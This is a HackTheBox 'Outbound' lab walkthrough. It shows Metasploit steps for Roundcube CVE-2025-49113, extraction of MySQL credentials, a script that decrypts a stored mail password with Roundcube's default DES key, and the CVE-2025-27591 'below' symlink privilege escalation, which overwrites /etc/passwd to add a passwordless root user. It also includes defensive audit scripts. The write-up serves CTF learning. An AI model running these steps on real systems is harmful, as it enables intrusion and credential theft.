HackTheBox Outbound Walkthrough

insidepwn

This machine was an easy Linux machine with initial credentials for the user tyler:LhKL1o9Nm3X2

💡
This machine has some VPN issues, so if you get errors that shouldn't be happening, try restarting your system.

Initial Enumeration

The nmap scan didn't turn up much: just 2 open ports, 22 and 80.

Foothold and user.txt

So we log into mail.outbound.htb, which is the domain; you can add the domain to /etc/hosts as:

sudo nano /etc/hosts
<YOUR_MACHINE_IP> mail.outbound.htb

Then log in as tyler with the given credentials. The webmail turns out to be Roundcube, version 1.6.10. I explored the website and found nothing else.

With the version in hand I searched online for a CVE and found an RCE, CVE-2025-49113.

Here is the GitHub link for an exploit: https://github.com/hakaioffsec/CVE-2025-49113-exploit, but I recommend using msfconsole for this; I'll explain why later in this part.

To run the exploit on your machine, first start Metasploit by typing msfconsole, then type the following (the module index shown by search may differ; pick the Roundcube module for CVE-2025-49113):

search roundcube
use 1
set LHOST <YOUR_IP_OPENVPN>
set RHOSTS mail.outbound.htb
set USERNAME tyler
set PASSWORD LhKL1o9Nm3X2
exploit

Let the exploit run, then type shell. To stabilize it, run script /dev/null -c bash; this gives you a shell as www-data.

Exploring further, I found a config file at /var/www/html/roundcube/config/config.inc.php, and in it the credentials for the MySQL service.

One more thing I got from this config file was the decryption key, which will be used later.

Using the MySQL password I had, I ran the following command to look at the databases (the command worked in the Metasploit shell but not in the shell from the GitHub exploit; I don't know why that was happening):

mysql -u roundcube -pRCDBPass2025

To further enumerate the databases I ran the following commands:

SHOW DATABASES;
use roundcube;
SHOW TABLES;
select * from session;

What we are doing here is listing the databases, selecting the roundcube database, and then reading the session table in it. The data is, as expected, the users' session data.

This was the important row: base64-decoding the session data gives us the data of user jacob.

The password we get here, L7Rv00A8TuwJAr67kITxxcSgnIk25Am/, is encrypted, so I searched a bit more for how to decrypt it and found the information in /var/www/html/roundcube/program/lib/Roundcube/rcube.php, namely the decrypt function.

Here it uses a $key called des_key, which we got from /var/www/html/roundcube/config/config.inc.php (scroll up a bit); anyway, I'll paste it here: rcmail-!24ByteDESkey*Str

With the help of ChatGPT I wrote a script to decrypt the password:

from base64 import b64decode
from Crypto.Cipher import DES3            # provided by the pycryptodome package
from Crypto.Util.Padding import unpad

# Encrypted password string taken from the roundcube session table
encrypted_password = "L7Rv00A8TuwJAr67kITxxcSgnIk25Am/"

# 24-byte DES3 key (des_key from config.inc.php)
des_key = b'rcmail-!24ByteDESkey*Str'

# Decode the base64-encoded data
data = b64decode(encrypted_password)

# Roundcube prepends the 8-byte IV to the ciphertext
iv = data[:8]
ciphertext = data[8:]

# Initialize DES3 cipher in CBC mode (DES-EDE3-CBC, Roundcube's default cipher_method)
cipher = DES3.new(des_key, DES3.MODE_CBC, iv)

# Decrypt the ciphertext
decrypted = cipher.decrypt(ciphertext)

# Remove padding: Roundcube 1.6 decrypts via openssl, which uses PKCS#7 padding;
# fall back to stripping trailing NUL bytes if the data is not PKCS#7-padded
try:
    cleaned = unpad(decrypted, DES3.block_size)
except ValueError:
    cleaned = decrypted.rstrip(b"\x00")

print("[+] Pass", cleaned.decode('utf-8', errors='ignore'))

Make sure the pycryptodome module is installed (pip install pycryptodome). Running this gives us the password for user jacob.
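The decryption above only works because des_key is readable from config.inc.php and, on this box, is still the value Roundcube ships as its default in defaults.inc.php. As an added example (my code, not the post's and not Roundcube's), here is a small Python audit a defender could run over a Roundcube config.inc.php: it pulls des_key out of the PHP config, flags the shipped default or a key that is not 24 bytes, flags a world-readable config file, and suggests a fresh 24-character key. The sample config text is constructed and the function names are my own.

```python
import os
import re
import secrets
import stat

# Roundcube's shipped default des_key (config/defaults.inc.php). Any instance still
# using it has an effectively public key for the passwords stored in its session table.
ROUNDCUBE_DEFAULT_DES_KEY = "rcmail-!24ByteDESkey*Str"

# Matches the PHP assignment  $config['des_key'] = '...';  with single or double quotes
_DES_KEY_RE = re.compile(r"""\$config\[\s*['"]des_key['"]\s*\]\s*=\s*(['"])(.*?)\1\s*;""")

# Constructed sample of a config.inc.php (not the real file from the box)
SAMPLE_CONFIG = """<?php
$config['db_dsnw'] = 'mysql://roundcube:<REDACTED>@localhost/roundcube';
$config['des_key'] = 'rcmail-!24ByteDESkey*Str';
$config['plugins'] = ['archive', 'zipdownload'];
"""


def extract_des_key(config_text: str):
    """Return the des_key value set in config.inc.php text, or None if it is not set."""
    m = _DES_KEY_RE.search(config_text)
    return m.group(2) if m else None


def audit_des_key(config_text: str) -> list:
    """Return a list of findings about the des_key setting (empty list = nothing to report)."""
    findings = []
    key = extract_des_key(config_text)
    if key is None:
        # config.inc.php overrides defaults.inc.php; an absent setting means the default applies
        findings.append("des_key not set explicitly; Roundcube falls back to the shipped default")
        return findings
    if key == ROUNDCUBE_DEFAULT_DES_KEY:
        findings.append("des_key is the Roundcube default value")
    key_len = len(key.encode("utf-8"))
    if key_len != 24:
        findings.append(f"des_key is {key_len} bytes, expected 24 for DES-EDE3")
    return findings


def audit_config_mode(mode: int) -> list:
    """Flag a config file whose permission bits let any local user read it."""
    findings = []
    if mode & stat.S_IROTH:
        findings.append(f"config is world-readable (mode {stat.S_IMODE(mode):04o})")
    return findings


def audit_config_file(path: str) -> list:
    """Run both checks against a real config.inc.php on disk."""
    with open(path, encoding="utf-8", errors="replace") as f:
        text = f.read()
    return audit_des_key(text) + audit_config_mode(os.stat(path).st_mode)


def suggest_new_des_key() -> str:
    """Return a random 24-character replacement key (18 random bytes, base64url-encoded)."""
    return secrets.token_urlsafe(18)


if __name__ == "__main__":
    for finding in audit_des_key(SAMPLE_CONFIG):
        print("[!]", finding)
    print("[+] suggested replacement des_key:", suggest_new_des_key())
```

Rotating des_key invalidates every password Roundcube has already stored in the session table under the old key, which is the point: once the key has been read from the config, those stored passwords should be treated as exposed.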

With jacob's credentials we log in to the website and find 2 mails in his inbox.

In one mail we get jacob's SSH credentials, and in the other we are told about some privileges to inspect logs. SSH in with jacob's credentials:

ssh jacob@mail.outbound.htb

And BOOM!! We got user.txt.

Privilege Escalation and root.txt

For privilege escalation I first did the most common check, sudo -l, to see what jacob can run with sudo without a password.

Before moving on: the below binary is used to monitor system resources, logs, usage and other things. To read more, check out this.

So now we will exploit the below binary. At first I didn't find anything great, but then I checked its version, which you can do by running

sudo /usr/bin/below live

The version came out to be 0.8.0.

Now I searched online for an exploit for that version and stumbled across CVE-2025-27591; to read more about this CVE, read this.

The CVE lets low-privileged users escalate to root through symlink attacks. The way we exploit it is as follows:

  1. Create a user entry with the uid and gid of root

  2. Remove root's error log at /var/log/below/error_root.log

  3. Symlink error_root.log to /etc/passwd

  4. Take a snapshot with the below binary, which creates error_root.log again

  5. Overwrite /etc/passwd

  6. Switch to the new user

echo 'spy::0:0:spy:/root:/bin/bash' > /tmp/spyuser
rm -f /var/log/below/error_root.log
ln -s /etc/passwd /var/log/below/error_root.log
sudo /usr/bin/below snapshot --begin now
cp /tmp/spyuser /var/log/below/error_root.log
su spy

Using these commands, you will gain root access.
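The commands above only work because jacob can delete and create entries in /var/log/below, and because below, running as root, writes to error_root.log without regard to where that entry points. As an added example (my code, not the post's and not part of below), here is a Python audit that checks a privileged tool's log directory for exactly those two conditions: write access for group or other without the sticky bit, and symlinked entries that resolve to a file outside the directory. build_demo_dir() constructs a throwaway replica of the weak layout in a temp directory so the check runs offline; the file names, contents and the stand-in for /etc/passwd there are made up.

```python
import os
import stat
import tempfile


def audit_log_dir(log_dir: str) -> list:
    """Return findings for a log directory written to by a root-owned process.

    1. Directory writable by group/other without the sticky bit: an unprivileged
       user can delete and re-create entries, which is what makes the symlink
       swap possible.
    2. An entry that is a symlink resolving outside the directory: a root-owned
       writer that follows it ends up writing to an arbitrary file.
    """
    findings = []
    mode = stat.S_IMODE(os.lstat(log_dir).st_mode)
    if mode & (stat.S_IWGRP | stat.S_IWOTH) and not mode & stat.S_ISVTX:
        findings.append(f"{log_dir} is writable by group/other without the sticky bit (mode {mode:04o})")

    real_dir = os.path.realpath(log_dir)
    for name in sorted(os.listdir(log_dir)):
        path = os.path.join(log_dir, name)
        if os.path.islink(path):
            target = os.path.realpath(path)
            if not target.startswith(real_dir + os.sep):
                findings.append(f"{path} is a symlink to {target} outside the log directory")
    return findings


def build_demo_dir() -> str:
    """Construct a replica of the weak layout (all paths and contents are made up):
    a world-writable log directory holding one normal log, one symlink that stays
    inside the directory, and one symlink that escapes to a stand-in for /etc/passwd."""
    base = tempfile.mkdtemp(prefix="below-audit-")
    log_dir = os.path.join(base, "below")
    os.mkdir(log_dir)
    os.chmod(log_dir, 0o777)            # mode 0777, no sticky bit

    with open(os.path.join(log_dir, "error_jacob.log"), "w") as f:
        f.write("constructed log line\n")
    # benign symlink: relative target that stays inside the log directory
    os.symlink("error_jacob.log", os.path.join(log_dir, "latest.log"))

    # stand-in for /etc/passwd, deliberately placed outside the log directory
    fake_passwd = os.path.join(base, "fake_passwd")
    with open(fake_passwd, "w") as f:
        f.write("root:x:0:0:root:/root:/bin/bash\n")
    os.symlink(fake_passwd, os.path.join(log_dir, "error_root.log"))
    return log_dir


def demo() -> list:
    """Build the replica and audit it; returns the two expected findings."""
    return audit_log_dir(build_demo_dir())


if __name__ == "__main__":
    for finding in demo():
        print("[!]", finding)
```

On a real host you would call audit_log_dir("/var/log/below") from a root cron job or a configuration-management check; a clean result is an empty list. The fix on the directory side is a mode such as 0755 owned by root (or 1777 if unprivileged writes are genuinely needed), which is what removes the precondition for the swap.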

And now you can read root.txt.

That's it for the machine.

Thanks for reading the walkthrough. Hope you liked it! Do leave a comment for feedback or queries!!
